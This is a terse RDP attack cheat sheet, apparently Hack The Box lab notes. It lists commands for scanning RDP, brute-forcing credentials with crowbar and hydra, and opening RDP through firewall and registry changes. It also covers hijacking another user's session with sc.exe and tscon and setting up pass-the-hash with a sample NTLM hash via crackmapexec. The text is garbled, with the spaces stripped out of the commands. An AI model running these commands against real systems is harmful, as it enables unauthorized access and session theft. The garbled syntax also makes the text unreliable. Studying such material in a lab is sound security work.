#we can connect to RDP servers on Linux using xfreerdp, rdesktop, or Remmina#FootprintingIntrusionz3r0X@htb[/htb]$nmap-sV-sC10.129.201.248-p3389--scriptrdp*# RDP Security CheckIntrusionz3r0X@htb[/htb]$gitclonehttps://github.com/CiscoCXSecurity/rdp-sec-check.git&&cdrdp-sec-checkIntrusionz3r0X@htb[/htb]$rdp-sec-check.pl10.0.0.94#BruteforceIntrusionz3r0X@htb[/htb]$crowbar-brdp-s192.168.220.142/32-Uusers.txt-c'password123'Intrusionz3r0X@htb[/htb]#hydra-Lusernames.txt-p'password123'192.168.2.143rdp#Enable RDPc:\> netshadvfirewallfirewalladdrulename="RDP"protocol=TCPdir=inlocalport=3389action=allowc:\> netshadvfirewallfirewalladdrulename="RDP"protocol=TCPdir=outlocalport=3389action=allowc:\> regadd"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server"/vfDenyTSConnections/tREG_DWORD/d0/f#---------Session Hijacking-------- #(This method no longer works on Server 2019.)C:\htb> queryuser# USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME#>juurena rdp-tcp#13 1 Active 7 8/25/2021 1:23 AM# lewen rdp-tcp#14 2 Active * 8/25/2021 1:28 AMC:\htb> sc.execreatesessionhijackbinpath="cmd.exe /k tscon 2 /dest:rdp-tcp#13"#[SC] CreateService SUCCESSC:\htb> netstartsessionhijack#-------------------------------------# Initiate an RDP SessionIntrusionz3r0X@htb[/htb]$xfreerdp/u:cry0l1t3/p:"P455w0rd!"/v:10.129.201.248Intrusionz3r0X@htb[/htb]$ gitclonehttps://github.com/CiscoCXSecurity/rdp-sec-check.git&&cdrdp-sec-check#RDP Pass-the-Hash (PtH)C:\htb> regaddHKLM\System\CurrentControlSet\Control\Lsa/tREG_DWORD/vDisableRestrictedAdmin/d0x0/f#Enable RDP via Crackmap execIntrusionz3r0X@htb[/htb]$crackmapexecsmb10.10.10.40-u"Administrator"-H'cdf51b162460b7d5bc898f493751a0cc'-Mrdp-oaction=enable